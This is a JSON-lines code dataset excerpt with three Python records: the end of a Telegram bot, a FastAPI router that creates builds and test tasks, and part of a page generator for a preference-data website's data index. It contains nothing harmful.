bot.reply_to(message, bmsg.links)\n\n\n\n@bot.message_handler(commands=['faq_en'])\ndef handle_faq_en(message):\n bot.reply_to(message, bmsg.faq_en)\n\n\n@bot.message_handler(content_types=[\"new_chat_members\"])\ndef handle_joinchat(message):\n bot.reply_to(message, bmsg.hlp)\n\nif __name__ == '__main__':\n reminder = CleaningReminder(token, chat_id, fixed_date)\n reminder.add_remind_time('10:00')\n reminder.polling()\n\n bot.polling()\n\n","repo_name":"yuvaphalle/SITAPTBOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18196540663","text":"\"\"\"\n@File : business_auto_deliver_test.py\n@Date : 2021/11/24 9:15\n@Author: 九层风(YePing Zhang)\n@Contact : yeahcheung213@163.com\n\"\"\"\nfrom fastapi import APIRouter\nfrom app.schemas import test_deliver_schemas, build_schemas, test_task_schemas\nfrom app.utils import response_code, html2string\nfrom app.models.build_model import *\nfrom app.db.database import *\nfrom app.models.test_task_model import *\nfrom app.models.action_model import *\nfrom app.config import ROOT_DIRECTORY, APPLY_TEST\nimport os\n\n# TEST_TASK_TEMPLATE_PATH = r'D:\\Python\\Project\\pythonProject\\TomTawCI\\app\\static\\testTaskDesc.html'\nTEST_TASK_TEMPLATE_PATH = os.path.join(ROOT_DIRECTORY, 'static', APPLY_TEST['TEMPLATE'])\n\nrouter = APIRouter(prefix=\"/ewordci/auto-deliver-test\", tags=[\"business\"])\n\n\n# 处理deliver入参\n\n\ndef para_deliver2build_schema(parameter: test_deliver_schemas.Deliver):\n\t\"\"\"\n\t将入参解析处理成build的参数\n\t根据是否有传老版本id,来返回带有id的更新参数或���不带id的新增参数\n\t:param parameter:\n\t:return:build_schema\n\t\"\"\"\n\tbuild_schema = build_schemas.Build(name=parameter.new_build_name,\n\t\t\t\t\t\t\t\t\t product=parameter.product_id,\n\t\t\t\t\t\t\t\t\t project=parameter.project_id,\n\t\t\t\t\t\t\t\t\t filePath=parameter.filePath,\n\t\t\t\t\t\t\t\t\t scmPath=parameter.scmPath,\n\t\t\t\t\t\t\t\t\t builder=parameter.builder,\n\t\t\t\t\t\t\t\t\t desc=parameter.desc,\n\t\t\t\t\t\t\t\t\t date=date.today())\n\tif parameter.old_build_id: # 有旧版本id则为更新操作,需要将id加进去\n\t\tbuild_schema.id = parameter.old_build_id\n\treturn build_schema\n\n\ndef para_deliver2task(parameter: test_deliver_schemas.Deliver):\n\t\"\"\"\n\t:param parameter:\n\t:return: 创建测试单需要的dict数据\n\t\"\"\"\n\t# 通过版本信息获取版本id,为了与测试单相关联\n\tquery_condition = dict(product=parameter.product_id, project=parameter.project_id, name=parameter.new_build_name)\n\t# print(query_condition)\n\tbuild_list = query_build_multiple_condition(query_condition)\n\tbuild_id = build_list[0].id\n\t# 获取测试单参数\n\ttask_name = \"{}{}{} 测试申请\".format(parameter.project_name, parameter.new_build_name,\n\t\t\t\t\t\t\t\t\t parameter.test_type)\n\ttest_desc_dict = dict(ifSmoke=parameter.if_smoke,\n\t\t\t\t\t\t manTime=parameter.man_time,\n\t\t\t\t\t\t testType=parameter.test_type,\n\t\t\t\t\t\t testSuggest=parameter.test_suggest,\n\t\t\t\t\t\t buildDesc=parameter.desc)\n\ttask_desc = html2string.task_html2string(TEST_TASK_TEMPLATE_PATH, test_desc_dict)\n\ttest_task_dict = dict(name=task_name, product=parameter.product_id, project=parameter.project_id, build=build_id,\n\t\t\t\t\t\t owner=parameter.owner, pri=parameter.pri, mailto=parameter.mailto, desc=task_desc,\n\t\t\t\t\t\t begin=parameter.begin,\n\t\t\t\t\t\t end=parameter.end)\n\treturn test_task_dict\n\n\n@router.post(\"/create\", name=\"自动创建版本、创建测试单\")\nasync def generate_deliver_task(deliver_info: test_deliver_schemas.Deliver):\n\t# 新建、修改版本处理\n\tif 
deliver_info.old_build_id: # 通过是入参中是否传老版本id判断是修改还是新增\n\t\t# 获取入参的版本信息\n\t\tupdate_build_schema = para_deliver2build_schema(deliver_info)\n\t\tupdate_build_schema.name = deliver_info.new_build_name\n\t\tupdate_build_schema.desc = deliver_info.desc\n\t\tupdate_build_schema.scmPath = deliver_info.scmPath\n\t\tupdate_build_schema.filePath = deliver_info.filePath\n\t\tupdate(update_build_schema, BuildModel)\n\t\t# 插入操作日志\n\t\tdb_action = ActionModel(\n\t\t\tget_action_dict('build', deliver_info.old_build_id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\tdeliver_info.builder, 'edited'))\n\t\tcreate(db_action)\n\t\tbuild_handle_flag = True\n\t\tbuild_handle_message = \"版本修改成功\"\n\telse:\n\t\t# 判断新增的数据版本号是否重复\n\t\tcondition = dict(name=deliver_info.new_build_name, product=deliver_info.product_id,\n\t\t\t\t\t\t project=deliver_info.project_id) # 版本查询条件\n\t\tif query_build_multiple_condition(condition):\n\t\t\tbuild_handle_flag = False\n\t\t\tbuild_handle_message = \"已存在同的版本\"\n\t\telse:\n\t\t\tcreate_build_schema = para_deliver2build_schema(deliver_info)\n\t\t\tdb_build = BuildModel(create_build_schema.dict())\n\t\t\tcreate(db_build)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('build', db_build.id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'opened'))\n\t\t\tcreate(db_action)\n\t\t\tbuild_handle_flag = True\n\t\t\tbuild_handle_message = \"版本创建成功\"\n\ttask_handle_flag = False\n\ttask_handle_message = ''\n\tsuccess_task_id = 0 # 用于存放创建成功的测试单id\n\tif build_handle_flag: # 判断版本是否创建成功\n\t\ttask_dict = para_deliver2task(deliver_info)\n\t\t# 判断此版本号的测试单是否存在,若存在则修改,不存在则创建\n\t\t# 根据版本号查询测试单\n\t\tupdate_test_task = query_testtask(dict(build=task_dict['build']))\n\t\tif update_test_task:\n\t\t\tupdate_task_schema = test_task_schemas.TestTask(**task_dict)\n\t\t\tupdate_task_schema.id = update_test_task.id\n\t\t\tupdate(update_task_schema, TestTaskModel)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('testtask', update_task_schema.id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'edited'))\n\t\t\tcreate(db_action)\n\t\t\ttask_handle_message = \"测试单修改成功\"\n\t\t\tsuccess_task_id = update_test_task.id\n\t\telse:\n\t\t\tdb_test_task = TestTaskModel(task_dict)\n\t\t\tcreate(db_test_task)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('testtask', db_test_task.id,deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'opened'))\n\t\t\tcreate(db_action)\n\t\t\ttask_handle_message = \"测试单创建成功\"\n\t\t\tsuccess_task_id = db_test_task.id\n\t\ttask_handle_flag = True\n\tif build_handle_flag and task_handle_flag:\n\t\treturn response_code.resp_200(success_task_id,\n\t\t\t\t\t\t\t\t\t message='{}且{}'.format(build_handle_message, task_handle_message))\n\telse:\n\t\treturn response_code.resp_204(message=build_handle_message)\n\n\nif __name__ == \"__main__\":\n\tpass\n","repo_name":"cappuccino213/TomTawCI","sub_path":"app/routers/business_auto_deliver_test.py","file_name":"business_auto_deliver_test.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17471542526","text":"import glob\nimport os\nimport subprocess\nimport re\n\n#\n# Reletive Paths.\n#\n\nDATA_ROOT = \"../data/\"\nWEB_DATA_ROOT = \"/data/\"\nPACK_LOCATION = \"packs/\"\nDATA_TYPES = [\"election\", \"matching\", \"combinatorial\", 
\"optimization\"]\nDATA_NAMES = [\"Election Data\", \"Matching Data\", \"Rating and Combinatorial Preference Data\", \"Optimization Data\"]\nLINK_NAMES = ['''''', '''''', '''''', '''''']\n\nEXTENSIONS = [\"soc\", \"soi\", \"toc\", \"toi\", \"tog\", \"mjg\", \"wmg\", \"pwg\", \"wmd\"]\n\n\nEXTENSION_LONG = { \"soc\":\"Strict Order - Complete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"soi\":\"Strict Order - Incomplete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toc\":\"Order with Ties - Complete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toi\":\"Order with Ties - Incomplete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"tog\":\"Tournament Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"mjg\":\"Majority Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmg\":\"Weighted Majority Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pwg\":\"Pairwise Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmd\":\"Weighted Matching Data\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"zip\":\"Zipped Data File\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"dat\":\"Extra Data File (CSV)\"}\n\nFORMAT_LINKS = { \"soc\":\"/data/format.php#soc\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"soi\":\"/data/format.php#soi\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toc\":\"/data/format.php#toc\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toi\":\"/data/format.php#toi\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"tog\":\"/data/format.php#tog\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"mjg\":\"/data/format.php#mjg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmg\":\"/data/format.php#wmg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pwg\":\"/data/format.php#pwg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmd\":\"/data/format.php#wmd\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"zip\":\"/data/format.php#data\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"dat\":\"/data/format.php#data\"}\n\n\n\n\n#\n# Page Pieces.\n#\n\nHEAD_AND_MENU = \\\n\t'''\n\t\n\t\n\t\n\t\t\n\t\n\n\t\n\t\t
\n\t\t\t\n\t'''\n\nDATA_INDEX_INTRO = \\\n\t'''\n\t\t\t
\n\t\t\t\t
Data Sets
\n\t\t\t\t

Our data is separated into four categories:\n\t\t\t\t

    \n\t\t\t\t\t
  • Election Data (ED): Contains data that either came from an election or can be interpreted as election data. We have data from actual elections, movie rankings, and competitor rankings from various sporting competitions.
  • \n\t\t\t\t\t
  • Matching Data (MD): Contains data where agents express preferences over items (and vice versa) in order to pair agents to items. Currently, we only have synthetic data from organ and kidney matching in the USA.
  • \n\t\t\t\t\t
  • Rating and Combinatorial Preference Data (CD): Contains data from a broad set of domains that can be viewed as combinatorial and/or multidimensional including multi-attribute ratings, CP-nets, and GAI-nets.
  • \n\t\t\t\t\t
  • Optimization Data (OD): Contains data that is typically associated with optimization problems, including SAT and CSP problems.
  • \n\t\t\t\t

    \n\n\t\t\t\t

    Each data file we host has a unique identifier in the format [XX]-#####-########.EXT. These numbers are broken down as:\n\t\t\t\t

      \n\t\t\t\t\t
    • XX is a 2 letter category code from above.
    • \n\t\t\t\t\t
    • ##### is a 5 digit Series Code which specifies the source of the data.
    • \n\t\t\t\t\t
    • ######## is an 8 digit Element Number for each individual file of a series.\n\t\t\t\t\t
    • EXT is a unique file extension describing the type of data in the file.\n\t\t\t\t
    \n\t\t\t\t

    \n\n\t\t\t\t

    Each data file is labeled as either Original, Induced, or Imbued.\n\t\t\t\t

      \n\t\t\t\t\t
    • Original: Data that has only been converted into our formatting.
    • \n\t\t\t\t\t
    • Induced: Data that has been induced from another context. For example, computing a pairwise relation from a set of strict total orders. No assumptions have been made to create these files, just a change in the expression language.
    • \n\t\t\t\t\t
    • Imbued: Data that has been imbued with extra information. For example, extending an incomplete partial order by placing all unranked candidates tied at the end.
    • \n\t\t\t\t
    \n\t\t\t\tWe encourage you to understand some of the impacts that making these assumptions can have; see, e.g., A Behavioral Perspective on Social Choice. Anna Popova, Michel Regenwetter, and Nicholas Mattei. Annals of Mathematics and Artificial Intelligence 68(1-3), 2013.\n\t\t\t\t

    \n\t\t\t
\n\t'''\n\nPICTURES_AND_LINKS = \\\n\t'''\n\t\t\t\n\t\t\t
\n\t\t\t\t

\n\t\t\t\t\"\"\n\n\t\t\t\t

Supported By:

\"\"\n\t\t\t\t

\n\t\t\t
\n\n\t\t\t\n\t\t\t
\n\t\t\t
\n\t\t\t
\n\t'''\n\n### Can only be used with a 8 width grid!!!\nLINKS = \\\n\t'''\n\t\t\t\n\t\t\t
\n\t\t\t\t
Links
\n\t\t\t\t\n\t\t\t
\n\t'''\n\nBREAK_AND_FOOTER = \\\n\t'''\n\t\t\t\n\t\t\t\n\t\t
\n\t\n\t\n\t'''\n\ndef make_study_html(studies):\n\t\t'''\n\t\tConvert a record in the following format:\n\t\tBudgeted Social Choice: From Consensus to Personalized Decision Making; Tyler Lu and Craig Boutilier; IJCAI 2011; | Record 2 | Record 3\n\n\t\tinto a html UL list with links to google scholar for\n\t\tthe title of the paper.\n\n\t\tParameters\n\t\t-----------\n\t\tstudies: string\n\t\t\t\tA string in the above format which details the studie\n\t\t\t\tused with a dataset. The individual records are deliminted\n\t\t\t\twith a | while the components of a record are delimited with ;\n\t\t\t\tIf there are no ;'s then it means we return the NONE indicator.\n\n\t\tReturns\n\t\t-----------\n\t\t\t\tFormatted HTML string of